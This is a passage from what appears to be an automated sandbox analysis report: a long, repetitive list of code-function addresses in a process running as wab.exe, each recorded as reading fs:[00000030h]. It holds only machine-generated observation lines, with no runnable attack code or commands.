        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov eax, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9FF90 mov edi, dword ptr fs:[00000030h]10_2_1FD9FF90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCF80 mov eax, dword ptr fs:[00000030h]10_2_1FDDCF80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE1FB8 mov eax, dword ptr fs:[00000030h]10_2_1FDE1FB8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBFB0 mov eax, dword ptr fs:[00000030h]10_2_1FDDBFB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h]10_2_1FD9CF50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h]10_2_1FD9CF50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h]10_2_1FD9CF50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h]10_2_1FD9CF50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h]10_2_1FD9CF50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h]10_2_1FD9CF50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA1F50 mov eax, dword ptr fs:[00000030h]10_2_1FDA1F50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD7F51 mov eax, dword ptr fs:[00000030h]10_2_1FDD7F51
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCF50 mov eax, dword ptr fs:[00000030h]10_2_1FDDCF50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE74F68 mov eax, dword ptr fs:[00000030h]10_2_1FE74F68
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE24F40 mov eax, dword ptr fs:[00000030h]10_2_1FE24F40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE24F40 mov eax, dword ptr fs:[00000030h]10_2_1FE24F40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE24F40 mov eax, dword ptr fs:[00000030h]10_2_1FE24F40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE24F40 mov eax, dword ptr fs:[00000030h]10_2_1FE24F40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE1FF42 mov eax, dword ptr fs:[00000030h]10_2_1FE1FF42
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAF69 mov eax, dword ptr fs:[00000030h]10_2_1FDCAF69
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAF69 mov eax, dword ptr fs:[00000030h]10_2_1FDCAF69
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCBF60 mov eax, dword ptr fs:[00000030h]10_2_1FDCBF60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCF1F mov eax, dword ptr fs:[00000030h]10_2_1FDDCF1F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA2F12 mov eax, dword ptr fs:[00000030h]10_2_1FDA2F12
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5DF2F mov eax, dword ptr fs:[00000030h]10_2_1FE5DF2F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE47F3E mov eax, dword ptr fs:[00000030h]10_2_1FE47F3E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE56F00 mov eax, dword ptr fs:[00000030h]10_2_1FE56F00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE21F13 mov eax, dword ptr fs:[00000030h]10_2_1FE21F13
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2DF10 mov eax, dword ptr fs:[00000030h]10_2_1FE2DF10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCEF28 mov eax, dword ptr fs:[00000030h]10_2_1FDCEF28
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6BEE6 mov eax, dword ptr fs:[00000030h]10_2_1FE6BEE6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6BEE6 mov eax, dword ptr fs:[00000030h]10_2_1FE6BEE6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6BEE6 mov eax, dword ptr fs:[00000030h]10_2_1FE6BEE6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6BEE6 mov eax, dword ptr fs:[00000030h]10_2_1FE6BEE6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9BEC0 mov eax, dword ptr fs:[00000030h]10_2_1FD9BEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9BEC0 mov eax, dword ptr fs:[00000030h]10_2_1FD9BEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h]10_2_1FDABEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h]10_2_1FDABEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h]10_2_1FDABEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h]10_2_1FDABEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h]10_2_1FDABEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h]10_2_1FDABEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h]10_2_1FDABEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h]10_2_1FDABEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCFEC0 mov eax, dword ptr fs:[00000030h]10_2_1FDCFEC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2FEC5 mov eax, dword ptr fs:[00000030h]10_2_1FE2FEC5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD8EF5 mov eax, dword ptr fs:[00000030h]10_2_1FDD8EF5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3EF4 mov eax, dword ptr fs:[00000030h]10_2_1FDA3EF4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3EF4 mov eax, dword ptr fs:[00000030h]10_2_1FDA3EF4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3EF4 mov eax, dword ptr fs:[00000030h]10_2_1FDA3EF4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD3EEB mov ecx, dword ptr fs:[00000030h]10_2_1FDD3EEB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD3EEB mov eax, dword ptr fs:[00000030h]10_2_1FDD3EEB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD3EEB mov eax, dword ptr fs:[00000030h]10_2_1FDD3EEB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6EE0 mov eax, dword ptr fs:[00000030h]10_2_1FDA6EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6EE0 mov eax, dword ptr fs:[00000030h]10_2_1FDA6EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6EE0 mov eax, dword ptr fs:[00000030h]10_2_1FDA6EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6EE0 mov eax, dword ptr fs:[00000030h]10_2_1FDA6EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3EE1 mov eax, dword ptr fs:[00000030h]10_2_1FDA3EE1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD2E9C mov eax, dword ptr fs:[00000030h]10_2_1FDD2E9C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD2E9C mov ecx, dword ptr fs:[00000030h]10_2_1FDD2E9C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2CEA0 mov eax, dword ptr fs:[00000030h]10_2_1FE2CEA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2CEA0 mov eax, dword ptr fs:[00000030h]10_2_1FE2CEA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2CEA0 mov eax, dword ptr fs:[00000030h]10_2_1FE2CEA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2DEAA mov eax, dword ptr fs:[00000030h]10_2_1FE2DEAA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9AE90 mov eax, dword ptr fs:[00000030h]10_2_1FD9AE90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9AE90 mov eax, dword ptr fs:[00000030h]10_2_1FD9AE90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9AE90 mov eax, dword ptr fs:[00000030h]10_2_1FD9AE90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA7E96 mov eax, dword ptr fs:[00000030h]10_2_1FDA7E96
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD3E8F mov eax, dword ptr fs:[00000030h]10_2_1FDD3E8F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE3AEB0 mov eax, dword ptr fs:[00000030h]10_2_1FE3AEB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE3AEB0 mov eax, dword ptr fs:[00000030h]10_2_1FE3AEB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5DEB0 mov eax, dword ptr fs:[00000030h]10_2_1FE5DEB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9FEA0 mov eax, dword ptr fs:[00000030h]10_2_1FD9FEA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2DE9B mov eax, dword ptr fs:[00000030h]10_2_1FE2DE9B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9DEA5 mov eax, dword ptr fs:[00000030h]10_2_1FD9DEA5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9DEA5 mov ecx, dword ptr fs:[00000030h]10_2_1FD9DEA5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9EE5A mov eax, dword ptr fs:[00000030h]10_2_1FD9EE5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBE51 mov eax, dword ptr fs:[00000030h]10_2_1FDDBE51
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBE51 mov eax, dword ptr fs:[00000030h]10_2_1FDDBE51
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB5E40 mov eax, dword ptr fs:[00000030h]10_2_1FDB5E40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE20E7F mov eax, dword ptr fs:[00000030h]10_2_1FE20E7F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE20E7F mov eax, dword ptr fs:[00000030h]10_2_1FE20E7F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE20E7F mov eax, dword ptr fs:[00000030h]10_2_1FE20E7F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9BE78 mov ecx, dword ptr fs:[00000030h]10_2_1FD9BE78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5DE46 mov eax, dword ptr fs:[00000030h]10_2_1FE5DE46
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE72E4F mov eax, dword ptr fs:[00000030h]10_2_1FE72E4F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE72E4F mov eax, dword ptr fs:[00000030h]10_2_1FE72E4F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA6E71 mov eax, dword ptr fs:[00000030h]10_2_1FDA6E71
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE49E56 mov ecx, dword ptr fs:[00000030h]10_2_1FE49E56
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD98E1D mov eax, dword ptr fs:[00000030h]10_2_1FD98E1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9DE10 mov eax, dword ptr fs:[00000030h]10_2_1FD9DE10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov ecx, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h]10_2_1FDCAE00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA1E30 mov eax, dword ptr fs:[00000030h]10_2_1FDA1E30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA1E30 mov eax, dword ptr fs:[00000030h]10_2_1FDA1E30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBDE2D mov eax, dword ptr fs:[00000030h]10_2_1FDBDE2D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBDE2D mov eax, dword ptr fs:[00000030h]10_2_1FDBDE2D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBDE2D mov eax, dword ptr fs:[00000030h]10_2_1FDBDE2D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3DD0 mov eax, dword ptr fs:[00000030h]10_2_1FDA3DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3DD0 mov eax, dword ptr fs:[00000030h]10_2_1FDA3DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCEDD3 mov eax, dword ptr fs:[00000030h]10_2_1FDCEDD3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCEDD3 mov eax, dword ptr fs:[00000030h]10_2_1FDCEDD3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE6DDC6 mov eax, dword ptr fs:[00000030h]10_2_1FE6DDC6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2DDC0 mov eax, dword ptr fs:[00000030h]10_2_1FE2DDC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5DDC7 mov eax, dword ptr fs:[00000030h]10_2_1FE5DDC7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCCDF0 mov eax, dword ptr fs:[00000030h]10_2_1FDCCDF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDCCDF0 mov ecx, dword ptr fs:[00000030h]10_2_1FDCCDF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD96DF6 mov eax, dword ptr fs:[00000030h]10_2_1FD96DF6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CDEA mov eax, dword ptr fs:[00000030h]10_2_1FD9CDEA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9CDEA mov eax, dword ptr fs:[00000030h]10_2_1FD9CDEA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE24DD7 mov eax, dword ptr fs:[00000030h]10_2_1FE24DD7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE24DD7 mov eax, dword ptr fs:[00000030h]10_2_1FE24DD7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h]10_2_1FDAADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h]10_2_1FDAADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h]10_2_1FDAADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h]10_2_1FDAADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h]10_2_1FDAADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h]10_2_1FDAADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC0DE1 mov eax, dword ptr fs:[00000030h]10_2_1FDC0DE1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE68DAE mov eax, dword ptr fs:[00000030h]10_2_1FE68DAE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE68DAE mov eax, dword ptr fs:[00000030h]10_2_1FE68DAE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE74DAD mov eax, dword ptr fs:[00000030h]10_2_1FE74DAD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD99D96 mov eax, dword ptr fs:[00000030h]10_2_1FD99D96
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD99D96 mov eax, dword ptr fs:[00000030h]10_2_1FD99D96
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD99D96 mov ecx, dword ptr fs:[00000030h]10_2_1FD99D96
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2DDB1 mov eax, dword ptr fs:[00000030h]10_2_1FE2DDB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9FD80 mov eax, dword ptr fs:[00000030h]10_2_1FD9FD80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC8DBF mov eax, dword ptr fs:[00000030h]10_2_1FDC8DBF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDC8DBF mov eax, dword ptr fs:[00000030h]10_2_1FDC8DBF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBDDB1 mov eax, dword ptr fs:[00000030h]10_2_1FDBDDB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBDDB1 mov eax, dword ptr fs:[00000030h]10_2_1FDBDDB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBDDB1 mov eax, dword ptr fs:[00000030h]10_2_1FDBDDB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCDB1 mov ecx, dword ptr fs:[00000030h]10_2_1FDDCDB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCDB1 mov eax, dword ptr fs:[00000030h]10_2_1FDDCDB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDCDB1 mov eax, dword ptr fs:[00000030h]10_2_1FDDCDB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD9DAF mov eax, dword ptr fs:[00000030h]10_2_1FDD9DAF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDAFDA9 mov eax, dword ptr fs:[00000030h]10_2_1FDAFDA9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD6DA0 mov eax, dword ptr fs:[00000030h]10_2_1FDD6DA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA0D59 mov eax, dword ptr fs:[00000030h]10_2_1FDA0D59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA0D59 mov eax, dword ptr fs:[00000030h]10_2_1FDA0D59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA0D59 mov eax, dword ptr fs:[00000030h]10_2_1FDA0D59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h]10_2_1FDA8D59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h]10_2_1FDA8D59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h]10_2_1FDA8D59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h]10_2_1FDA8D59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA8D59 mov eax, dword ptr fs:[00000030h]10_2_1FDA8D59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE38D6B mov eax, dword ptr fs:[00000030h]10_2_1FE38D6B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBD4E mov eax, dword ptr fs:[00000030h]10_2_1FDDBD4E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBD4E mov eax, dword ptr fs:[00000030h]10_2_1FDDBD4E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD97D41 mov eax, dword ptr fs:[00000030h]10_2_1FD97D41
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov ecx, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB3D40 mov eax, dword ptr fs:[00000030h]10_2_1FDB3D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h]10_2_1FE4FD78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h]10_2_1FE4FD78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h]10_2_1FE4FD78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h]10_2_1FE4FD78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE4FD78 mov eax, dword ptr fs:[00000030h]10_2_1FE4FD78
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2DD47 mov eax, dword ptr fs:[00000030h]10_2_1FE2DD47
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA7D75 mov eax, dword ptr fs:[00000030h]10_2_1FDA7D75
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA7D75 mov eax, dword ptr fs:[00000030h]10_2_1FDA7D75
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE61D5A mov eax, dword ptr fs:[00000030h]10_2_1FE61D5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE61D5A mov eax, dword ptr fs:[00000030h]10_2_1FE61D5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE61D5A mov eax, dword ptr fs:[00000030h]10_2_1FE61D5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE61D5A mov eax, dword ptr fs:[00000030h]10_2_1FE61D5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD4D1D mov eax, dword ptr fs:[00000030h]10_2_1FDD4D1D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE28D20 mov eax, dword ptr fs:[00000030h]10_2_1FE28D20
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2FD2A mov eax, dword ptr fs:[00000030h]10_2_1FE2FD2A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE2FD2A mov eax, dword ptr fs:[00000030h]10_2_1FE2FD2A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD96D10 mov eax, dword ptr fs:[00000030h]10_2_1FD96D10
